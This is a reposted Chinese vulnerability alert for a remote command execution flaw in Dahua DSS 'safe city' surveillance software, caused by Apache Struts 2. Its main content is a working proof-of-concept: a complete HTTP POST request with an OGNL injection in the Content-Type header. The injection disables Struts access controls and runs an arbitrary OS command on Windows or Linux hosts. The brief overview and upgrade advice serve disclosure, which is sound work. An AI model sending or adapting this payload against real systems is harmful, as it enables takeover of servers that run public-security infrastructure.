大华DSS远程代码执行漏洞-poc

admin 2024年6月12日09:30:50评论42 views字数 1495阅读4分59秒阅读模式
0x00 漏洞编号
  • 暂无

0x01 危险等级
  • 高危
0x02 漏洞概述

大华DSS-平安城市解决方案是大华技术提供的一套全面、可靠的智能安防解决方案,以技术创新为驱动力,致力于提升城市整体安全水平。该方案基于先进的人工智能和物联网技术,为城市提供了集视频监控、报警系统、人脸识别、车辆管理、数据分析等功能于一体的综合安防管理平台。

大华DSS远程代码执行漏洞-poc

0x03 漏洞详情
漏洞类型:远程命令执行
影响:执行任意命令
简述:大华DSS-平安城市采用Apache Struts 2作为网站应用框架,由于该应用程序框架存在远程命令执行漏洞,攻击者可以利用该漏洞在服务器上执行任意命令并写入后门,从而入侵服务器并获取服务器的管理员权限。
0x04 影响版本
  • 大华DSS

0x05 POC

POST /config/user_toLoginPage.action HTTP/1.1Host: {{Hostname}}Connection: closeContent-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}Cache-Control: no-cachePragma: no-cacheUser-Agent: Java/1.8.0_333Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 0
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://www.dahuatech.com/

原文始发于微信公众号(浅安安全):漏洞预警 | 大华DSS远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月12日09:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华DSS远程代码执行漏洞-pochttps://cn-sec.com/archives/2840547.html

发表评论

匿名网友 填写信息